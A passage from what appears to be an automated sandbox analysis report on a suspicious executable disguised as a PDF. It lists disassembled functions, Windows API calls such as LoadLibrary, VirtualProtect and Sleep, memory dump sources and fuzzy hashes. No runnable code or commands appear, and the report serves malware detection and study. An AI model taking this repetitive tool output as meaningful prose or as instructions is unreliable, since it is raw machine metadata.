                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: 73889bfa3f2e671437f65e111bf826854c13d412aee277e9c4d7614c435a5553
                                                    • Instruction ID: da44c16ee1e4fe928d92706aef1731eaa193a25bf0f0e2bacf4b6a2fd419075c
                                                    • Opcode Fuzzy Hash: 73889bfa3f2e671437f65e111bf826854c13d412aee277e9c4d7614c435a5553
                                                    • Instruction Fuzzy Hash: A6F0B471901604AAD7137B69C84776EBEA06F41334F25C118E461AF2D9CB7C8A019B95
                                                    Function 0034E8A0 Relevance: 1.7, APIs: 1, Instructions: 198windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034E959
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessagePeek
                                                    • String ID:
                                                    • API String ID: 2222842502-0
                                                    • Opcode ID: cdce7180fd40ea6937412335c320411597b44bd2a8d5313d6f94c77f30add447
                                                    • Instruction ID: 0178c015eeaf32ded03a2a5228050493e8edb286f60231dc63d03f7c0b3ae78d
                                                    • Opcode Fuzzy Hash: cdce7180fd40ea6937412335c320411597b44bd2a8d5313d6f94c77f30add447
                                                    • Instruction Fuzzy Hash: 0D71E7709043808FEB27CF24C8897AA7BD0FB55308F09497DE9859F6A1D775E885CB92
                                                    Function 00CEC1D8 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CEBA48: GetFileAttributesW.KERNELBASE(?), ref: 00CEBA53
                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00CEC310
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AttributesCreateDirectoryFile
                                                    • String ID:
                                                    • API String ID: 3401506121-0
                                                    • Opcode ID: d31d35e2132d629ed9f19716ec7e5ebd7474eff526ac90dd34e39f4d6a7948f6
                                                    • Instruction ID: 884b46b076b82ea1e0e487700ab99b6ddaed17ae2efc0e0c1526fe7c6752b2dc
                                                    • Opcode Fuzzy Hash: d31d35e2132d629ed9f19716ec7e5ebd7474eff526ac90dd34e39f4d6a7948f6
                                                    • Instruction Fuzzy Hash: 17518331A1024896DF14EFA1D845BEF7339EF58300F004669F509EB290EB799B45CBA5
                                                    Function 00362957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __flush.LIBCMT ref: 00362A0B
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __flush__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 4101623367-0
                                                    • Opcode ID: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                                    • Instruction ID: af8ee3637cc7293ce19d088df9969f1a6367aa57e89bfba571075f612b46cbd6
                                                    • Opcode Fuzzy Hash: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                                    • Instruction Fuzzy Hash: B241C930700F069FDB2A8EA5C88156F77B6AF84350B16C53DE855CB148DBB4DD508B40
                                                    Function 0035ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 1b33f636a489534e9f272f4cd10c3eb9792c70344f2f4ff0065624850fdaaf2c
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: A4310470A00105DFC71ADF18C490A69FBF6FF49341B6586A5E819CB666DB30EEC5CB80
                                                    Function 003B9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 21383b5c285938fe9fc49432c9b28ce152f4afab072d88e2f57a9966c2c213f9
                                                    • Instruction ID: e192702c67735783678cbbf17ae024b91eddb37d103197d99871131619888f2a
                                                    • Opcode Fuzzy Hash: 21383b5c285938fe9fc49432c9b28ce152f4afab072d88e2f57a9966c2c213f9
                                                    • Instruction Fuzzy Hash: 57413A705046518FDB26CF14C484F1ABBE0AF45308F1989ACE99A4B762D772E849CF52
                                                    Function 003441A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00344214: FreeLibrary.KERNEL32(00000000,?), ref: 00344247
                                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003439FE,?,00000001), ref: 003441DB
                                                      • Part of subcall function 00344291: FreeLibrary.KERNEL32(00000000), ref: 003442C4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load
                                                    • String ID:
                                                    • API String ID: 2391024519-0
                                                    • Opcode ID: 7e09b872e479f1626287d79df004297ab0f3d33dc6bd3f6db502e5506c4d6f25
                                                    • Instruction ID: 4a53259bae3e94d5973cc2a1933e9ec285647a9e29df0ce6119266d1f56be60a
                                                    • Opcode Fuzzy Hash: 7e09b872e479f1626287d79df004297ab0f3d33dc6bd3f6db502e5506c4d6f25
                                                    • Instruction Fuzzy Hash: C3119131600306AADB12AF64DC06FAEB7E99F40704F108839B596AE1C1DAB0EA019B60
                                                    Function 003B9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 40e1542ec9ac71c491e281ebcb3d8b2d8a24baf0a8a987620567442e8783f38c
                                                    • Instruction ID: e8e46a508d30d28be1e8a3a0f213303849dbf69df362916e65095733b2bdddaf
                                                    • Opcode Fuzzy Hash: 40e1542ec9ac71c491e281ebcb3d8b2d8a24baf0a8a987620567442e8783f38c
                                                    • Instruction Fuzzy Hash: 482105705086018FDB2ADF68C444F2ABBF1BF85305F154968EA9A4B672D732F849CF52
                                                    Function 0036AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___lock_fhandle.LIBCMT ref: 0036AFC0
                                                      • Part of subcall function 00367BDA: __getptd_noexit.LIBCMT ref: 00367BDA
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                    • String ID:
                                                    • API String ID: 1144279405-0
                                                    • Opcode ID: 819b4496d5a6454135948c5bb95c66218ac1ee972e7ae0cdb2f9511cd48109d0
                                                    • Instruction ID: dd3fadee3935ac98c22e0420646e074fe38c056827c60aa0b9c8ddde722e6ed6
                                                    • Opcode Fuzzy Hash: 819b4496d5a6454135948c5bb95c66218ac1ee972e7ae0cdb2f9511cd48109d0
                                                    • Instruction Fuzzy Hash: 121191728056109FD7137FA4C942769BFA0AF41335F66C250E474AF1EAC7B58D408FA6
                                                    Function 003439DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                    • Instruction ID: 20ce384f151982473dbf4d9feae63715522b0e1046d402b306f6dd2704a76695
                                                    • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                    • Instruction Fuzzy Hash: B901493150010DAFCF06EFA4C8918FFBBB8EF11344F148165B5559B195EA30AB49DF60
                                                    Function 00362AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00362AED
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: 09767d84a2a888d9e98cfddb7bec619f5cd22781cbf6c40a91e1467b5a695ce9
                                                    • Instruction ID: 2575136b3ef367b7d60d2e9dbcb03d402a288ade7d4aa14904e9f1bd02852809
                                                    • Opcode Fuzzy Hash: 09767d84a2a888d9e98cfddb7bec619f5cd22781cbf6c40a91e1467b5a695ce9
                                                    • Instruction Fuzzy Hash: 09F0C231900605AADF23AFA5CC0239F7AA5BF00310F16C415F4109F199CBB98A22EB81
                                                    Function 00344252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,003439FE,?,00000001), ref: 00344286
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 39fa9981de06a93b15be2e62badf58e7912cbdca606e5f8c809bfc90f9059469
                                                    • Instruction ID: ec1b4338cb55a84b8ac311628bfcc447754d681fa04ed7c35a3a13358e10eea5
                                                    • Opcode Fuzzy Hash: 39fa9981de06a93b15be2e62badf58e7912cbdca606e5f8c809bfc90f9059469
                                                    • Instruction Fuzzy Hash: 47F01571505702CFCB369F64D890916BBF8AF043253258E3EF1D68AA20C7B2A940DB50
                                                    Function 003440A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003440C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath
                                                    • String ID:
                                                    • API String ID: 82841172-0
                                                    • Opcode ID: ee69971e4b2443b28b2b3fa473fa593628f179f5cf052b06e642c30e9364191c
                                                    • Instruction ID: e72b43b52f49486ea24cd74f53a5807249b9cea5c9b846ecdcf35404df50c3f4
                                                    • Opcode Fuzzy Hash: ee69971e4b2443b28b2b3fa473fa593628f179f5cf052b06e642c30e9364191c
                                                    • Instruction Fuzzy Hash: 55E072326002241BC712A658CC42FEA73ACDF887A0F0900B0F908EB208DAA0A9818690
                                                    Function 00CEBA48 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 00CEBA53
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                    • Instruction ID: c1da1ab808278fb7a01c6fd4d8a955d12d3d500a19e24a1d6af3952e4a078441
                                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                    • Instruction Fuzzy Hash: 0CE08C30909348EBCF10CAAA8904ABA73A8AB06360F104768A826C32A0DA308F00F650
                                                    Function 00CEBA18 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 00CEBA23
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                    • Instruction ID: 790591dd9c6ed83a9dac79cccb5e681f8e1c13b0df0e4729d976c3d21623326e
                                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                    • Instruction Fuzzy Hash: EFD0A73090520CEBCF10CFB59D04AEE73A8DB05320F104764FD15C3280D6719E00A750
                                                    Function 00CED404 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 00CED419
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction ID: 28775a315239dca51ec5b019cda306941c23620964ce873848f4086fe3734f7f
                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction Fuzzy Hash: 10E0BF7494110DEFDB00DFA8D5496DD7BB4EF14301F1045A1FD05D7680DB309E548A62
                                                    Function 00CED408 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 00CED419
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: f0275f2c672c311522ae0fd83bc625c17acbd1a1fae67aecc441970ccce3b0cd
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: 3DE0E67494110DDFDB00DFB8D5496DD7BB4EF14301F104561FD05D2280D6309D508A62

                                                    Non-executed Functions

                                                    Function 003AF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 003AF87D
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003AF8DC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003AF919
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003AF940
                                                    • SendMessageW.USER32 ref: 003AF966
                                                    • _wcsncpy.LIBCMT ref: 003AF9D2
                                                    • GetKeyState.USER32(00000011), ref: 003AF9F3
                                                    • GetKeyState.USER32(00000009), ref: 003AFA00
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003AFA16
                                                    • GetKeyState.USER32(00000010), ref: 003AFA20
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003AFA4F
                                                    • SendMessageW.USER32 ref: 003AFA72
                                                    • SendMessageW.USER32(?,00001030,?,003AE059), ref: 003AFB6F
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 003AFB85
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003AFB96
                                                    • SetCapture.USER32(?), ref: 003AFB9F
                                                    • ClientToScreen.USER32(?,?), ref: 003AFC03
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003AFC0F
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 003AFC29
                                                    • ReleaseCapture.USER32 ref: 003AFC34
                                                    • GetCursorPos.USER32(?), ref: 003AFC69
                                                    • ScreenToClient.USER32(?,?), ref: 003AFC76
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 003AFCD8
                                                    • SendMessageW.USER32 ref: 003AFD02
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 003AFD41
                                                    • SendMessageW.USER32 ref: 003AFD6C
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003AFD84
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003AFD8F
                                                    • GetCursorPos.USER32(?), ref: 003AFDB0
                                                    • ScreenToClient.USER32(?,?), ref: 003AFDBD
                                                    • GetParent.USER32(?), ref: 003AFDD9
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 003AFE3F
                                                    • SendMessageW.USER32 ref: 003AFE6F
                                                    • ClientToScreen.USER32(?,?), ref: 003AFEC5
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003AFEF1
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 003AFF19
                                                    • SendMessageW.USER32 ref: 003AFF3C
                                                    • ClientToScreen.USER32(?,?), ref: 003AFF86
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003AFFB6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003B004B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 2516578528-4164748364
                                                    • Opcode ID: 47a5629e018a1a254a852d665897c0028f442a72b037f5d84ef07854100d935f
                                                    • Instruction ID: 7e48fa315b0cefec426e224899ffbba37cadd92e0af3166b25bdd3c9c9591bb4
                                                    • Opcode Fuzzy Hash: 47a5629e018a1a254a852d665897c0028f442a72b037f5d84ef07854100d935f
                                                    • Instruction Fuzzy Hash: E632CC74604244AFDB22CFA4C884FAABBA8FF4A354F140A39F695872B1C731EC55CB51
                                                    Function 003AAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 003AB1CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
